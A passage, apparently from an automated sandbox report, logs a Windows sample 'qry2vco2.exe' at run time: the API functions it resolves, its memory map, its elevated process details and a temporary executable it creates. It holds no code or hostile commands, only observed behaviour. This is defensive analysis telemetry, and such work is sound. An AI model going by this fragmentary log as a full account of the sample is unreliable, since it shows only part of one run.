| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:54 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #197: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #197 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "Genko_2.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:26, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x874 |
| Parent PID | 0xa7c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
554
0x
878
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0069ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x0069ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00827fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x009b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x01dbffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
